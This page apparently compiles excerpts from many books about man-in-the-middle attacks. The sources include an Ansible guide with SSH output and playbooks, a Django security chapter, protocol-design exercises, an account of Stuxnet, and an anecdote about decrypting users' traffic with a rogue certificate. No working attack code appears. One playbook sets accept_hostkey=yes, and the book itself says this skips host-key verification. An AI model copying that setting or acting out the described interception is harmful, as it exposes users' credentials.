CHAPTER III: THE HUNDRED-DOLLAR TAKEDOWN
CHAPTER IV: MAN IN THE MIDDLE
CHAPTER V: THE CHINA RULES
CHAPTER VI: THE KIMS STRIKE BACK
CHAPTER VII: PUTIN’S PETRI DISH
CHAPTER VIII: THE FUMBLE
CHAPTER IX: WARNING FROM THE COTSWOLDS
CHAPTER X: THE SLOW AWAKENING
CHAPTER XI: THREE CRISES IN THE VALLEY
CHAPTER XII: LEFT OF LAUNCH
AFTERWORD
ACKNOWLEDGMENTS
NOTES
PREFACE
A year into Donald J.
…
“He did huge damage that we’re all paying for,” Clapper insisted. “He was a narcissistic, self-centered ideologue.” All true. But he may have also done us a favor by forcing Washington and the new giants of the Internet—Google, Facebook, Microsoft, Intel—to rethink their relationship with the US government as well.
CHAPTER IV MAN IN THE MIDDLE
No hard feelings, but my job is to make their job hard. —Eric Grosse, Google’s head of security, talking about the NSA
It was the smiley face that got to the engineers at Google. The face was drawn at the bottom of a handwritten diagram on yellow paper that looked a bit like something an engineer might sketch at a coffee shop—save for the fact that it was on a slide marked TOP SECRET//SI//NOFORN and included in Snowden’s trove of leaked documents.
…
The diagram revealed that the NSA was trying, maybe successfully, to insert itself in the nexus between the “Public Internet” and the “Google Cloud” in a move called a “man in the middle” attack. In other words, everything that went into and came out of Google’s international data centers, connecting its customers around the world, could be intercepted. The drawing included an arrow pointing to the place in the diagram that corresponded to where the NSA was inserting itself.
Ansible: Up and Running: Automating Configuration Management and Deployment the Easy Way by Lorin Hochstein
Amazon Web Services, cloud computing, continuous integration, Debian, DevOps, domain-specific language, don't repeat yourself, general-purpose programming language, Infrastructure as a Service, job automation, machine readable, MITM: man-in-the-middle, pull request, side project, smart transportation, web application
The output was:
OpenSSH_6.2p2, OSSLShim 0.9.8r 8 Dec 2011
debug1: Reading configuration data /etc/ssh_config
debug1: /etc/ssh_config line 20: Applying options for *
debug1: /etc/ssh_config line 102: Applying options for *
debug1: auto-mux: Trying existing master
debug1: Control socket "/Users/lorinhochstein/.ansible/cp/ansible-ssh-127.0.0.1-2222-vagrant" does not exist
debug2: ssh_connect: needpriv 0
debug1: Connecting to 127.0.0.1 [127.0.0.1] port 2222.
debug2: fd 3 setting O_NONBLOCK
debug1: connect to address 127.0.0.1 port 2222: Connection refused
ssh: connect to host 127.0.0.1 port 2222: Connection refused
If you have host key verification enabled, and the host key in ~/.ssh/known_hosts doesn’t match the host key of the server, then using -vvvv will output an error that looks like this:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
c3:99:c2:8f:18:ef:68:fe:ca:86:a9:f5:95:9e:a7:23.
Please contact your system administrator.
Add correct host key in /Users/lorinhochstein/.ssh/known_hosts to get rid of this message.
…
Cloning as root and changing permissions
- name: verify the config is valid sudoers file
  local_action: command visudo -cf files/99-keep-ssh-auth-sock-env
  sudo: True
- name: copy the sudoers file so we can do agent forwarding
  copy: >
    src=files/99-keep-ssh-auth-sock-env
    dest=/etc/sudoers.d/99-keep-ssh-auth-sock-env
    owner=root group=root mode=0440
    validate='visudo -cf %s'
  sudo: True
- name: check out my private git repository
  git: repo=git@github.com:lorin/mezzanine-example.git dest={{ proj_path }}
  sudo: True
- name: set file ownership
  file: >
    path={{ proj_path }}
    state=directory
    recurse=yes
    owner={{ user }}
    group={{ user }}
  sudo: True
Host Keys
Every host that runs an SSH server has an associated host key. The host key acts like a signature that uniquely identifies the host. Host keys exist to prevent man-in-the-middle attacks. If you’re cloning a Git repository over SSH from GitHub, you don’t really know whether the server that claims to be github.com is really GitHub’s server, or is an impostor that used DNS spoofing to pretend to be github.com. Host keys allow you to check that the server that claims to be github.com really is github.com.
…
Recall in Chapter 6 how the git module took an accept_hostkey parameter:
- name: check out the repository on the host
  git: repo={{ repo_url }} dest={{ proj_path }} accept_hostkey=yes
The git module can hang when cloning a Git repository using the SSH protocol if host key checking is enabled on the host and the Git server’s SSH host key is not known to the host. The simplest approach is to use the accept_hostkey parameter to tell Git to automatically accept the host key if it isn’t known, which is the approach we use in Example 6-5. Many people simply accept the host key and don’t worry about these types of man-in-the-middle attacks. That’s what we did in our playbook, by specifying accept_hostkey=yes as an argument when invoking the git module. However, if you are more security conscious and don’t want to automatically accept the host key, then you can manually retrieve and verify GitHub’s host key, and then add it to the system-wide /etc/ssh/known_hosts file or, for a specific user, to the user’s ~/.ssh/known_hosts file.
Django Book by Matt Behrens
Benevolent Dictator For Life (BDFL), book value, business logic, create, read, update, delete, database schema, distributed revision control, don't repeat yourself, duck typing, en.wikipedia.org, Firefox, full text search, loose coupling, MITM: man-in-the-middle, MVC pattern, revision control, Ruby on Rails, school choice, slashdot, SQL injection, web application
Both the attack itself and those tools are covered in great detail in Chapter 16.
Session Forging/Hijacking
This isn’t a specific attack, but rather a general class of attacks on a user’s session data. It can take a number of different forms:
• A man-in-the-middle attack, where an attacker snoops on session data as it travels over the wire (or wireless) network.
• Session forging, where an attacker uses a session ID (perhaps obtained through a man-in-the-middle attack) to pretend to be another user.
An example of these first two would be an attacker in a coffee shop using the shop’s wireless network to capture a session cookie. She could then use that cookie to impersonate the original user.
…
Because HTTP data is sent in cleartext, cookies are extremely vulnerable to snooping attacks. That is, an attacker snooping on the wire can intercept a cookie and read it. This means you should never store sensitive information in a cookie. There’s an even more insidious attack, known as a man-in-the-middle attack, wherein an attacker intercepts a cookie and uses it to pose as another user. Chapter 20 discusses attacks of this nature in depth, as well as ways to prevent it. Cookies aren’t even secure from their intended recipients. Most browsers provide easy ways to edit the content of individual cookies, and resourceful users can always use tools like mechanize (http://wwwsearch.sourceforge.net/mechanize/) to construct HTTP requests by hand.
…
Although it’s nearly impossible to detect someone who’s hijacked a session ID, Django does have built-in protection against a brute-force session attack. Session IDs are stored as hashes (instead of sequential numbers), which prevents a brute-force attack, and a user will always get a new session ID if she tries a nonexistent one, which prevents session fixation. Notice that none of those principles and tools prevents man-in-the-middle attacks. These types of attacks are nearly impossible to detect. If your site allows logged-in users to see any sort of sensitive data, you should always serve that site over HTTPS. Additionally, if you have an SSL-enabled site, you should set the SESSION_COOKIE_SECURE setting to True; this will make Django only send session cookies over HTTPS.
Barefoot Into Cyberspace: Adventures in Search of Techno-Utopia by Becky Hogge, Damien Morris, Christopher Scally
"World Economic Forum" Davos, A Declaration of the Independence of Cyberspace, back-to-the-land, Berlin Wall, Buckminster Fuller, Chelsea Manning, citizen journalism, cloud computing, corporate social responsibility, disintermediation, DIY culture, Douglas Engelbart, Douglas Engelbart, Electric Kool-Aid Acid Test, Evgeny Morozov, Fall of the Berlin Wall, game design, Hacker Conference 1984, Hacker Ethic, Hans Moravec, informal economy, information asymmetry, Jacob Appelbaum, jimmy wales, John Gilmore, John Markoff, John Perry Barlow, Julian Assange, Kevin Kelly, mass immigration, Menlo Park, military-industrial complex, Mitch Kapor, MITM: man-in-the-middle, moral panic, Mother of all demos, Naomi Klein, Nelson Mandela, Network effects, New Journalism, Norbert Wiener, off-the-grid, peer-to-peer, Richard Stallman, Silicon Valley, Skype, Socratic dialogue, Steve Jobs, Steve Wozniak, Steven Levy, Stewart Brand, systems thinking, technoutopianism, Telecommunications Act of 1996, The Hackers Conference, Vannevar Bush, Whole Earth Catalog, Whole Earth Review, WikiLeaks
The implications are serious – a fairly simple hack has turned the world’s network of over three billion GSM mobile phones into the most widely deployed privacy threat on the planet. Karsten is offhand as he underlines the implications of his work in the introduction to his talk:
Cloning, spoofing, man-in-the-middle, decrypting, sniffing, crashing, DoSing, or just plain having fun. If you can work a BitTorrent client and a standard GNU build process then you can do it all, too. Prepare to change the way you look at your cell phone, forever.
If all this sounds like bragging jargon, then listen to how the BBC report the breakthrough: “The work could allow anyone – including criminals – to eavesdrop on private phone conversations”.
…
IM: Instant Message
ISP: Internet Service Provider
La Quadrature du Net: France-based organisation that works to preserve digital rights and freedoms
Mailman: A computer software application for managing electronic mailing lists
MAME: MAME (an acronym of Multiple Arcade Machine Emulator) is an emulator application designed to recreate the hardware of arcade game systems in software on modern personal computers and other platforms.
man-in-the-middle: A form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker.
Principles of Protocol Design by Robin Sharp
accounting loophole / creative accounting, business process, discrete time, exponential backoff, fault tolerance, finite state, functional programming, Gödel, Escher, Bach, information retrieval, loose coupling, MITM: man-in-the-middle, OSI model, packet switching, quantum cryptography, RFC: Request For Comment, stochastic process
Note that A’s personal secret xA is not revealed directly to B (or to any adversaries who may be listening), and it is computationally
[Fig. 6.14 An attack on the Diffie-Hellman protocol. (a) Normal operation: A and B exchange α^xA and α^xB; (b) During man-in-the-middle attack: the intruder M sits between A and B, so that A derives KA and B derives KB.]
Protocol 26
Message 1  A → B : α^xA mod q
Message 2  B → A : (α^xB mod q, {SB(α^xB, α^xA)}K)
Message 3  A → B : {SA(α^xB, α^xA)}K
Fig. 6.15 Station-to-Station key agreement protocol. Here, α is a publicly known integer which is a primitive root of a publicly known prime q, and xA and xB are secret integers known only to A and B respectively.
…
This protocol sends an encrypted, signed copy of the exponentials used to evaluate the shared secret key together with the exponentials themselves. This enables the recipients to check the integrity and source of the received information. As in the three-way handshake and similar protocols, the third message confirms to B that the new key K is actually shared with A. These additional features protect the protocol against the simple man-in-the-middle attack shown in Figure 6.14. However, users of the protocol should still take care, as you will see if you try to solve Exercise 6.9. You should never underestimate the difficulty of designing a correct and secure key exchange protocol!
6.6 Non-cryptographic Methods
Not all forms of security can be provided solely by the use of cryptographic methods.
…
When certificates are used to provide authentication, it is important that a certificate can be revoked if it is no longer valid – for example, if the key which it contains is known to be compromised, or if the owner of the certificate ceases to exist. Suggest a suitable protocol for dealing with revocation in the case of a system with multiple certification authorities, based on an hierarchical trust model.
6.9. The Station-to-Station protocol given as Protocol 26 is sensitive to a type of man-in-the-middle attack in which the attacker changes the first message from A to B, so that it looks as though it came from a third party, C. (Technically, this can be done by changing the sender address in the PDU.) B then replies to the intruder, who sends the reply on to A. When A sends its third message, it believes that it is talking to B, whereas B believes it is talking to C.
Countdown to Zero Day: Stuxnet and the Launch of the World's First Digital Weapon by Kim Zetter
air gap, Ayatollah Khomeini, Brian Krebs, crowdsourcing, data acquisition, Doomsday Clock, drone strike, Edward Snowden, facts on the ground, false flag, Firefox, friendly fire, Google Earth, information retrieval, information security, John Markoff, Julian Assange, Kickstarter, Loma Prieta earthquake, machine readable, Maui Hawaii, military-industrial complex, MITM: man-in-the-middle, Morris worm, pre–internet, RAND corporation, rolling blackouts, Silicon Valley, skunkworks, smart grid, smart meter, South China Sea, Stuxnet, Timothy McVeigh, two and twenty, undersea cable, unit 8200, uranium enrichment, Vladimir Vetrov: Farewell Dossier, WikiLeaks, Y2K, zero day
Similarly, in the case of control systems, Langner had expected hackers would start out with simple denial-of-service attacks—sending a stop command to a PLC to halt whatever process it controlled—then escalate to logic bombs and other simple techniques to alter settings. But Stuxnet bypassed the rudimentary stages of development and jumped straight into one of the most sophisticated attacks someone could devise against a PLC. Of everything that Langner saw in the code, it was the man-in-the-middle attack against the safety system and operator monitoring stations that really blew his mind. The way Stuxnet smoothly disabled the former and deviously recorded the normal operations of the PLC to play them back to operators during the attack was astounding to him—the digital equivalent of a six-ton circus elephant performing a one-legged handstand.
…
Once the attack was done, it recycled itself and began again. This meant that rather than launching a single blow that caused catastrophic failure, as the researchers originally believed Stuxnet was designed to do, the attackers were going for subtle sabotage that extended over time. This, combined with the man-in-the-middle attack that concealed the sabotage from operators as it occurred, would have made it hard for anyone to detect and pinpoint the source of problems. The attackers, Falliere realized, had expected to go undetected for months, and indeed they had. The first part of the attack, a reconnaissance stage, lasted about thirteen days, during which Stuxnet sat silently on the PLC recording normal operations in order to loop that data back to operators when the sabotage began.
…
After the initial reconnaissance stage recording data for thirteen days, Stuxnet first increased the frequency of the converters to 1,410 Hz for fifteen minutes, then reduced it to 1,064 Hz, presumably the normal operating frequency, for about twenty-six days. Once Stuxnet recorded all of the data it needed to record during these three weeks, it dropped the frequency drastically to 2 Hz for fifty minutes, before restoring it to 1,064 Hz again. After another twenty-six days, the attack began again. Each time the sabotage commenced, the man-in-the-middle attack fed false frequency readings back to the operators and safety system to keep them blind to what was happening. SYMANTEC AT LAST knew exactly what Stuxnet was doing to the S7-315 PLC. But the attack targeting the S7-417 PLC remained a mystery. The two digital weapons arrived with the same missile but operated completely independent of each other.
The Art of Software Security Assessment: Identifying and Preventing Software Vulnerabilities by Justin Schuh
address space layout randomization, Albert Einstein, Any sufficiently advanced technology is indistinguishable from magic, bash_history, business logic, business process, database schema, Debian, defense in depth, en.wikipedia.org, Firefox, information retrieval, information security, iterative process, Ken Thompson, loose coupling, MITM: man-in-the-middle, Multics, MVC pattern, off-by-one error, operational security, OSI model, RFC: Request For Comment, slashdot, SQL injection, web application
First, the implementation should use a standard key exchange protocol, such as RSA, Diffie-Hellman, or El Gamal. These algorithms have been extensively validated and provide the best degree of assurance. The next concern is that the key exchange is performed in a secure manner, which means both sides of the communication must provide some means of identification to prevent man-in-the-middle attacks. All the key exchange algorithms mentioned previously provide associated signature algorithms that can be used to validate both sides of the connection. These algorithms require that both parties have already exchanged public keys or that they are available through some trusted source, such as a Public Key Infrastructure (PKI) server.
…
The client, therefore, has no way of knowing whether the certificate can be trusted. If users browse to the site, they get an error message stating that the certificate isn’t signed by a trusted authority; the only option is to accept the untrusted certificate or terminate the connection. An attacker capable of spoofing the server could exploit this situation to stage man-in-the-middle attacks and then hijack sessions or steal credentials.
Network Profiles
An application’s network profile is a crucial consideration when you’re reviewing operational security. Protocols such as Network File System (NFS) and Server Message Block (SMB) are acceptable inside the corporate firewall and generally are an absolute necessity.
…
In performing an audit, often you assume the effectiveness of a publicly validated encryption protocol. However, that doesn’t necessarily mean the protocol is being used safely. You might want to look at session establishment and see whether an observer can learn secret keys from watching a proposal and session setup.
• Man in the middle—Can an observer masquerade as a server and glean login credentials from clients without their knowledge?
• Protocol quirks—What interesting quirks does the protocol allow? For example, does it provide backward compatibility with previous, less secure versions of the protocol? If so, undermining security by forcing the use of old protocol features or authentication mechanisms might be possible.
Smart Grid Standards by Takuro Sato
business cycle, business process, carbon footprint, clean water, cloud computing, data acquisition, decarbonisation, demand response, distributed generation, electricity market, energy security, exponential backoff, factory automation, Ford Model T, green new deal, green transition, information retrieval, information security, Intergovernmental Panel on Climate Change (IPCC), Internet of things, Iridium satellite, iterative process, knowledge economy, life extension, linear programming, low earth orbit, machine readable, market design, MITM: man-in-the-middle, off grid, oil shale / tar sands, OSI model, packet switching, performance metric, RFC: Request For Comment, RFID, smart cities, smart grid, smart meter, smart transportation, Thomas Davenport
• Eavesdropping: The goal of the attacker is to violate the confidentiality of the communication, for example, by sniffing packets on the local area network (LAN) or by intercepting wireless transmissions.
• Man-in-the-middle attack: In a man-in-the-middle attack, the attacker acts toward both end points of the communication as if the attacker was the expected, legitimate partner. In addition to confidentiality violations, this also allows modifying the exchanged messages (integrity). Via man-in-the-middle attacks, weaknesses in the implementation or usage of certain key exchange and authentication protocols can be exploited to gain control even over encrypted sessions.
• Virus: A virus-based attack manipulates a legitimate user to bypass authentication and access control mechanisms in order to execute the malicious code injected by the attacker.
…
Index 460 Complementarities, 364, 371–373, 375 Component Interface Specification (CIS), 98, 101 Compressed Air Energy Storage (CAES), 146, 148 Concentrating Solar Power (CSP), 35, 44 Conceptual Reference Model (CRM), 339 Confidentiality, 301, 318, 342 Conventional backup capacity, 367, 368, 370, 373, 375, 384, 387 Co-production, 64 Counter (CTR), 307, 309 Control Center API (CCAPI), 97 Cybersecurity, 16, 18, 19, 342 Cyclic Redundancy Check (CRC), 310 Data Attribute (DA), 85 Data concentrator, 189 Data Link Layer (DLL), 303 Data Object (DO), 85 Decarbonizing scenarios, 357 Demand Response (DR), 183, 184, 259, 293 Demand Response and Load Control (DRLC), 187 Demand Response and Smart Grid Coalition (DRSG), 13 Denial of Service (DoS) attack, 301 Data Encryption Standard (DES), 312 Device Language Message Specification (DLMS), 191 Digital Subscriber Line (DSL), 266 Direct combustion, 68 Direct Load Control (DLC), 184 DISPOWER, 22, 159 Distributed Denial of Service (DDoS) attack, 301 Distributed Energy Resources (DERs), 145, 154, 248 Distributed power generation, 37 Distribution grid management, 344 Distribution Management System (DMS), 79 Eavesdropping, 301 ECHONET, 184, 224 EDGE, 287 EDISON, 25, 169 Electric Storage (ES), 145, 184, 187, 242 Electric Storage-Distributed Energy Resource (ES-DER), 151 Electric transportation, 342 Electric Vehicle (EV), 145, 184 Electric Vehicle Batteries (EVB), 164 Electric Vehicles (EV), 145 EMIX (Energy Market Information Exchange) 1.0, 187 Energy capacity, 364–370, 372, 375 Energy density, 164, 166 Energy dumping, 354, 364, 366, 369, 370, 384, 390 Energy Management System Application Program Interface (EMS-API), 98, 99 Energy Management Systems (EMS), 149, 186 Energy Service Interface (ESI), 149, 186, 208, 215 Energy storage, 379, 381, 382, 389 Energy-to-weight ratio, 164 Enhanced Geothermal System (EGS), 64 EtherCAT, 303, 324 Ethernet, 82, 84, 115 Ethernet powerlink, 303 EUC, 319 EU-DEEP, 159 EUI-64, 304, 309 European Committee for 
Electrotechnical Standardization (CENELEC), 8 European Committee for Standardization (CEN), 8 European Installation Bus (EIB), 235 EV-DO, 288 Fast DR, 184 Feeder Terminal Unit (FTU), 126 Fiber-to-the-home FTTH, 266 Framework Programme (FP), 159 Index Fuel cell, 56, 59, 60 Function set, 215 G3-PLC, 251, 262 G4V, 179 Gasification, 68 Generic Object Oriented Substation Event (GOOSE), 82 Generic Substation Event (GSE), 84 GEO satellite systems, 291 Geo-pressured, 64 Geothermal energy, 60, 63, 64 Geothermal ground, 64 Global smart grid federation, 14 GPRS, 287 Grid flexibility, 362, 364, 366, 387 Grid integration, 352, 374, 381 Grid to Vehicle (G2V), 146, 166 GridWise alliance (USA), 14 GridWise Architecture Council (GWAC), 12 Global System for Mobile Communication (GSM), 254, 272, 286, 287 Hidden terminal problem, 279 Highly elliptical orbit, 291 Home Area Network (HAN), 189, 214 Home Electronic System (HES), 184, 198 Home Energy Management System (HEMS), 227 Homegrid Forum (HGF), 12 HomePlug, 262 HomePlug AV HomePlug AV2, 263 Homeplug powerline alliance, 11 Highn speed packet access HSPA+, 286 Hypertext Transfer Protocol (HTTP), 105 Human Machine Interface (HMI), 84 Hybrid Electric Vehicles (HEVs), 163 Hydroelectric power, 37, 38, 40 Hydroelectric Pumped Storage (HPS), 146 Hydrogen, 59 Hydrogen fuel cell, 59 Hydropower, 35, 37 461 Hydropower plants, 38 Hydropower standards, 40 Hydrothermal, 64 IEC 60834, 106 IEC 60870, 88, 126 IEC 61508, 319 IEC 61850, 82 IEC 61968, 102 IEC 61970, 97, 125, 126 IEC 62351, 316 IEC 61784–3, 302 IEC SC65C/WG12, 301 IEDs, 82 IEEE 802.11, 254 IEEE 802.15.4, 304, 309 IEEE 802.22, 283 IETF, 312 iGREENGrid, 159 Internet Inter-ORB Protocol (IIOP), 105 IMT-advanced, 289, 290 India smart grid forum (India), 14 Information Exchange Model (IEM), 105 INSTEON, 235, 238 Institute of Electrical and Electronics Engineers (IEEE), 7 Integrity, 314, 318, 321, 342 Interchangeability, 330 Inter-control center communications protocol, 93 Interface Reference 
Model (IRM), 103 Intermittent renewable sources, 410 Internal Combustion Engines (ICE), 161 International Atomic Time (TAI), 309 International Electrotechnical Commission (IEC), 4 Telecontrol Application Service Element 2 (TASE.2), 93 International Energy Agency (IEA), 12 International Organization for Standardization (ISO), 6 International Telecommunication Union (ITU), 7 Internet Engineering Task Force (IETF), 2 Internet protocol, 257 Index 462 Interoperability, 248 IPsec, 213 IRED, 159 ISA100.11a, 278 ISO 9506, 95 ISO/OSI, 87 NB-PLC, 259 Near field communication, 274 Netricity, 251 Network energy capacity, 367, 368 Network Layer (NL), 303 Non-repudiation, 318 Japan smart community alliance, 14 Object Identification System (OBIS), 192 ONE-NET, 238 OPC UA, 324 OpenHAN 2.0, 217 Open V2G, 179 Operational policy, 372, 373 Optical fiber networks, 264 Organization for the Advancement of Structured Information Standards (OASIS), 11 Out-Of-Band (OOB), 304 KNX, 261 LEO satellite system, 291 Local Area Networks (LANs), 82 Logic Device (LD), 85 Logic Node (LN), 85 LONMARK, 234 LONTALK, 233 LONWORKS, 233 LTE Long term evolution, 289 Machine-to-machine M2M, 269 MACsec, 311 Man-in-the-middle attack, 301 Manufacturing Message Specification (MMS), 82 Master Data Telegram (MDT), 313 MERGE, 179 Meter Data Management System (MDMS), 189 MHR, 309 MIC, 305, 307 MICROGRIDS, 159 MMIC, 322 MOLECULES, 179 Molten Carbonate Fuel Cell (MCFC), 155 Multimode, 264 Passive optical networks, 252 Payload Data Unit (PDU), 307 Phase Change Materials (PCMs), 150 Photovoltaic (PV), 35 PKI, 319 Plug-in Electric Vehicle (PEV), 177, 187 Plug-in Hybrid Electric Vehicles (PHEVs), 147 Power capacity, 364–366, 369, 372 Power control center, 80 Power grid, 79 Power line communication, 263 Power-to-weight ratio, 164 PRIME, 261 Process layer, 84 PROFIBUS/PROFINET, 311 PROFIsafe, 302 Proton Exchange Membrane Fuel Cell (PEMFC), 155 Pumped Hydro Storage (PHS), 146, 147 Narrowband PLC, 251, 260 National Electrical 
Manufactures Association (NEMA), 11 National Institute of Standards and Technology (NIST), 7, 264 Radio frequency identification RFID, 270 Range anxiety, 161 Registration Process (RP), 221 RPL, 258, 259, 283 Index Safety integrity level, 322 Sampled Measured Values (SMV), 82 Sampling value (SV), 85 Satellite communication, 291 SCL, 111, 112 SDH, 265 Single-mode, 264, 265 Slow DR, 184 Smart Energy Profile (SEP) 2.0, 187 Smart Grid Interoperability Panel (SGIP), 14 Smart home and building automation, 183, 197 Society of Automotive Engineers (SAE) international, 7 Solar energy, 40 Solid Oxide Fuel Cell (SOFC), 155 SONET, 265 Specific Communication Service Mapping (SCSM), 84 Storage design and dispatch, 366 Storage usefulness, 365 Substation, 84–85 Substation layer, 84 Superconducting Magnetic Energy Storage (SMES), 147 Supervisory Control and Data Acquisition (SCADA), 80 SWITCH, 357 Symmetric channel model (BSC), 111 System Interface Exchange Descriptions (SIED), 128 TCP/IP, 79 Technical Committee 57 (TC57), 82 Telecommunications Industry Association (TIA), 8 Thermal Energy Storage (TES), 150 Time stamp, 310 UCA International Users Group (UCAIug), 10 Ultra capacitors, 150 UMTS, 288 463 Unified Modeling Language (UML), 174 United States Advanced Battery Consortium (USABC), 164 Unlicensed spectrum, 275, 283 Variability, 354, 356, 372, 375 Vehicle-to-Grid (V2G), 170 Very high penetration, 384 Virtual Consecutive Number (VCN), 316 Virtual End Node (VEN), 187 Virtual Power Plant (VPP), 145 Virtual Private Network (VPN), 318 Virtual Top Node (VTN), 189 Virus, 318 VSAT Very small aperture terminal, 292 WAVE2M, 258 WCDMA Wideband CDMA, 288 Weightless, 283 Wide Area Networks (WANs), 205 Wide Area situational awareness, 341 Wi-Fi, 9 Wi-Fi alliance, 9 WiMAX 10 IEEE 802.16, 290 Wind energy, 51, 54 Wind turbine, 52 Wired communication, 321, 322 Wireless standards, 268 Wireless technologies, 270 WirelessHART, 278 Worldwide Interoperability for Microwave Access (wimax) forum, 10 
X10, 235, 239 XML, 128 ZigBee, 277 ZigBee alliance, 10 ZigBee Home Automation (ZHA), 228 Z-Wave, 221, 224, 333
Beautiful security by Andy Oram, John Viega
Albert Einstein, Amazon Web Services, An Inconvenient Truth, Bletchley Park, business intelligence, business process, call centre, cloud computing, corporate governance, credit crunch, crowdsourcing, defense in depth, do well by doing good, Donald Davies, en.wikipedia.org, fault tolerance, Firefox, information security, loose coupling, Marc Andreessen, market design, MITM: man-in-the-middle, Monroe Doctrine, new economy, Nicholas Carr, Nick Leeson, Norbert Wiener, operational security, optical character recognition, packet switching, peer-to-peer, performance metric, pirate software, Robert Bork, Search for Extraterrestrial Intelligence, security theater, SETI@home, Silicon Valley, Skype, software as a service, SQL injection, statistical model, Steven Levy, the long tail, The Wisdom of Crowds, Upton Sinclair, web application, web of trust, zero day, Zimmermann PGP
The warning popped up because any traffic being encrypted was actually being decrypted at my laptop, not at the final destination as the user assumes. In other words, they’re running a secure, encrypted connection just as they want—except the encryption is using my certificate and I can trivially decrypt the data again. As the man in the middle, I can decrypt users’ data, record everything, and then reencrypt it and pass it along to its final destination. I could record usernames, passwords, email messages, and other potentially confidential information that the victim assumed was being passed securely to a trusted destination. Even a small slice of your personal networking traffic can open a chink for serious identity attacks.
…
Instead they have felt their way through the process and have just enough knowledge to pay their bills online and check their stock portfolio. Something like a digital certificate makes about as much sense to them as a proton accelerator. On the other hand, I find technically savvy people who have a comprehensive understanding not only of digital certificates but also of man-in-the-middle attacks. One might think these people would never fall for such a scam, but on the contrary, I have found that even these people are quick to fall victim. The reason is that—unlike my parents, who don’t understand anything—the experts understand it so well that they rationalize what is taking place.
…
Brazos, 206 Gutmann, Peter, 117 H handshakes, 28 Hannaford Brothers security breach, 67, 68, 211 hash algorithms data translucency and, 241 LAN Manager, 4 SET procedure, 78 Windows NT, 5 Hasselbacher, Kyle, 127 health care field infosecurity and, 208 security metrics, 34–38 Health Insurance Portability and Accountability Act (HIPAA), 80, 214 hierarchical trust cumulative trust comparison, 110 defined, 109 HijackThis change tracker, 92 HIPAA (Health Insurance Portability and Accountability Act), 80, 214 HIPS (Host-based Intrusion Prevention Systems), 253 Holz, Thorsten, 145 Homeland Security, Department of, 36 honeyclients defined, 133 future of, 146 implementation limitations, 143 open source, 133–135 operational results, 139–140 operational steps, 134, 137 related work, 144–145 second-generation, 135–138 storing and correlating data, 140 honeymonkeys, 144 Honeynet Project, 138, 145 honeypot systems defined, 133 proliferation of malware, 252 Honeywall, 138 host logging, 232–237 Host-based Intrusion Prevention Systems (HIPS), 253 hostile environments confirmation traps and, 10 specialization in, 249 hotspot services, 22 House Committee on Homeland Security, 201 Howard, Michael, 195 HTTPS protocol, 66 Hubbard, Dan, 144 Hula Direct ad broker, 98, 99 I IBM, social networking and, 159 IDEA (International Data Encryption Algorithm), 117, 118 iDefense Labs, 59, 156 identity certificates, 111 identity management services, 154 identity theft devaluing credit card information, 71 wireless networking, 23–25 IDS (intrusion detection system) building a resilient model, 233–237 challenges detecting botnets, 231 false positives, 217 functionality, 226 honeyclient support, 133, 144 host logging, 232–237 host-based, 253 improving detection with context, 228–231 limitations, 227, 229 log handling considerations, 218 Iframedollars.biz, 132 incident detection, 233 (see also malicious attacks) building a resilient model, 233–237 host logging and, 232–237 improving 
with context, 228–231 percentage identified, 226, 227 SQL Slammer worm, 225 InCtrl change tracker, 92 information dealers defined, 64 IRC data exchange, 67 malware producers and, 64 sources of information, 68 information security as long tail market, 165–167 balance in, 202–207 basic concepts, 200 cloud computing, 150–154 communication considerations, 207–211 connecting people and processes, 154–158 doing the right thing, 211–212 historical review, 248–251 host logging, 232 need for new strategies, 247 organizational culture, 200–202 overview, 147–150 September 11, 2001 and, 249 social networking and, 158–162 strict scrutiny, 252–254 suggested practices, 257 supercrunching, 153, 162–164 taking a security history, 44–46 web services, 150–154 Information Security Economics, 162–164 Information Security Group, 168 injected iFrames, 69 International Data Encryption Algorithm (IDEA), 117, 118 International Tariff on Arms Regulations (ITAR), 3 Internet Explorer exploit-based installs and, 92 open source honeyclients, 134 recent vulnerabilities, 131 Internet Relay Chat (see IRC) intranets, security flaws, 25 introducers in PGP, 113 (see also certificate authorities) defined, 109, 112 extended, 123 Web of Trust process, 113 intrusion detection system (see IDS) investment metrics, 47 IRC (Internet Relay Chat) botnet communication, 66 cyber underground communication, 65, 67 ISO 2700x standard, 214 ISPs, costs versus profits, 16–17 ITAR (International Tariff on Arms Regulations), 3 ITIL regulation, 214 iTunes, 165 J J/Secure, 76 JCB International, 76 Jericho Forum, 156 Jerusalem virus, 248 K Kaminsky, Dan, 161 KBA (knowledge-based authentication), 68 key loggers as information source, 68 specialization in, 249 key signatures bloat and harassment, 124 certificate support, 111 exportable, 125 freshness considerations, 122 in-certificate preferences, 126 Web of Trust, 113, 115, 120 keyrings, 112 keys (see certificates; public key cryptography) keyservers defined, 112 key-editing 
policies, 126 PGP Global Directory, 127 Klez virus, 248 knowledge-based authentication (KBA), 68 Kovah, Xeno, 138 L L0phtCrack government interest in, 13 learned helplessness example, 3–6 Lai, Xuejia, 117 LAN Manager, 4 Lancaster, Branko, 117 Langevin, Jim, 201 LANs, physical security inherent in, 28 Lansky, Jared, 90–92 learned helplessness backward compatibility and, 2 defined, 2, 7 L0phtCrack example, 3–6 overview, 2–7 Leeson, Nick, 38–49 legacy systems backward compatibility, 7 e-commerce security and, 74 end-of-life upgrades, 2, 7 password security and, 4–6 legal considerations balance in information security, 202–207 communication and information security, 207–211 doing the right thing, 211–212 information security concepts, 200 log handling, 223 organizational culture, 200–202 value of logs, 214 Levy, Steven, 119 LinkShare affiliate network, 102 Linux systems, 221 log management tools, 222–223 log messages, 215 logs case study, 218–221 challenges with, 216–218 classifying, 214 database, 221 defined, 215 email tracking, 221 future possibilities, 221–223 host logging, 232–237 incident detection and, 226, 228 regulatory compliance and, 214 universal standard considerations, 217 usefulness of, 153, 214, 215 long straddle trading strategy, 40 Lucent (see Bell Labs) Lynch, Aidan, 144 M machine learning, 254 malicious attacks, 228 (see also cyber underground; incident detection) attack indicators, 233–237 Blaster, 248 Code Red, 248 confirmation traps, 10 directionality of, 